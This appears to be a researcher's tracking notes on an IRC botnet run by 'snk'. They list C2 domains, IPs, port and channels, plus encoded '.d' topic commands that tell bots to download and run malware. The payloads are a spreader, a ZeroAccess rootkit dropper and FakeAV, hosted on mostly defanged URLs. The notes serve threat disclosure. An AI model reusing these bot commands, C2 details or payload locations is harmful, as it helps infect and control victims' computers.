Resolved srv5050.asia to 62.255.175.157
Resolved srv5050.pro to 62.255.175.157
This is snk’s new set of domains for his bot.
Server: srv5050.asia (backup domains are srv5050.pro and srv5050.in)
Port: 5050
Channel: #new
* Topic for #new is: .j #gt .d /100/97/111/124/49/59/47/127/124/127/58/64/116/118/98/124/102/100/48/127/101/100/57/107/112/38/96/93/121/
* Topic for #new set by x at Sun Dec 23 16:33:45 2012
Channel: #gt
* Topic for #gt is: .d /100/97/111/124/49/59/47/127/124/127/58/64/116/118/98/124/102/100/48/127/101/100/57/107/107/38/96/93/121/
* Topic for #gt set by x at Sun Dec 23 07:38:44 2012
Bots joining #new download hxxp://ccibltd.net/go.exe, which is snk’s spreading program.
Bots joining #gt download hxxp://ccibltd.net/gt.exe, which checks the country location using api.wipmania.com before downloading a copy of the zeroaccess rootkit from hxxp://ccibltd.net/st.exe.
Hosting infos: http://whois.domaintools.com/62.255.175.157
Update:
snk has noticed the attention and is switching to a new channel
* Topic for #new is: .d /100/97/111/124/49/59/47/109/126/122/123/83/114/126/110/100/96/105/110/112/100/102/127/127/112/122/43/70/115/34/111/123/12/106/41/115/100/127/
* Topic for #new set by x at Mon Dec 24 06:07:24 2012
Downloads hxxp://europeantripadvisor.co.uk/b.exe, which connects to the same server on channel #go
* Topic for #go is: .d /100/97/111/124/49/59/47/127/124/127/58/87/101/122/101/118/123/120/48/100/107/62/117/99/114/39/98/74/50/105/98/117/
* Topic for #go set by x at Mon Dec 24 12:35:05 2012
This channel downloads hxxp://www.treefix.uk.com/go.exe, which is snk’s spreading program.
Keep moving snk
* Topic for #go is: .j #gea
* Topic for #go set by x at Mon Dec 24 17:48:31 2012
* Topic for #gea is: .d /100/97/111/124/49/59/47/124/121/109/113/69/126/103/46/101/121/46/125/126/109/63/113/105/126/38/96/93/121/
* Topic for #gea set by x at Mon Dec 24 16:39:08 2012
#gea downloads hxxp://treefix.uk.com/gea.exe, which checks api.wipmania.com before downloading zeroaccess from hxxp://www.treefix.uk.com/st.exe
Once again,
* Topic for #go is: .d /100/97/111/124/49/59/47/122/98/107/124/79/99/123/46/115/125/46/107/122/47/101/102/101/49/109/125/64/
* Topic for #go set by x at Tue Dec 25 04:18:32 2012
Downloads hxxp://richltd.co.uk/upi.exe, which connects to #o
* Topic for #o is: .j #gea .d /100/97/111/124/49/59/47/127/124/127/58/87/127/122/102/127/125/100/100/126/110/117/56/111/112/38/112/78/51/127/52/117/91/109/
* Topic for #o set by x at Tue Dec 25 15:21:38 2012
Downloads hxxp://www.thefoodzone.co.uk/s.exe, which is snk’s spreading program
* Topic for #gea is: .d /100/97/111/124/49/59/47/124/99/109/114/76/120/123/122/127/124/101/48/114/111/62/99/103/48/120/98/11/121/116/127/
* Topic for #gea set by x at Tue Dec 25 09:29:43 2012
Downloads hxxp://www.thefoodzone.co.uk/pg.exe, which checks with api.wipmania.com before downloading hxxp://www.thefoodzone.co.uk/ppi.exe
Keep running snk
* Topic for #go is: .d /100/97/111/124/49/59/47/127/124/127/58/66/101/112/109/113/126/101/119/98/117/98/115/34/124/103/43/80/119/35/120/62/70/112/98/
* Topic for #go set by x at Wed Dec 26 11:39:55 2012
Downloads hxxp://aromaleisure.co.uk/b.exe, which connects to #o
* Topic for #o is: .d /100/97/111/124/49/59/47/120/123/37/96/70/116/119/46/115/125/46/107/122/47/105/56/105/103/109/
* Topic for #o set by x at Thu Dec 27 14:01:13 2012
Downloads hxxp://pp-tech.co.uk/y.exe, which connects to #y
* Topic for #y is: .j #gea .d /100/97/111/124/49/59/47/120/123/37/96/70/116/119/46/115/125/46/107/122/47/114/100/109/49/109/125/64/
* Topic for #y set by x at Thu Dec 27 14:05:57 2012
Downloads hxxp://pp-tech.co.uk/bra.exe, which is snk’s spreading program
* Topic for #gea is: .d /100/97/111/124/49/59/47/120/123/37/96/70/116/119/46/115/125/46/107/122/47/119/98/120/49/109/125/64/
* Topic for #gea set by x at Thu Dec 27 14:06:05 2012
Downloads hxxp://pp-tech.co.uk/gtt.exe, which is checks api.wipmania.com before downloading hxxp://aromaleisure.co.uk/stt.exe, which is zeroaccess.
snk u are a noob dont forget
Downloads:hxxp://bettyslist.com/b.exe
hxxp://deltatecc.net/putty.exe snk told me this is FakeAV lol
hxxp://74.208.223.26/sl.exe (bettyslist.com)
hxxp://87.106.60.248/gh.exe (deltatecc.net)
srv5050.asia TCP port 5050
Server: 213.165.85.114:5050
Server Password:
Username: x
Nickname: n[DEU|XP]rjiipla
Channel: #x (Password: (null))
Channeltopic: :.j #ss .d /100/97/111/124/49/59/47/106/110/124/96/90/100/115/105/99/102/46/125/126/109/63/101/96/49/109/125/64/
SMTP: 213.165.67.97:25 used to spread via email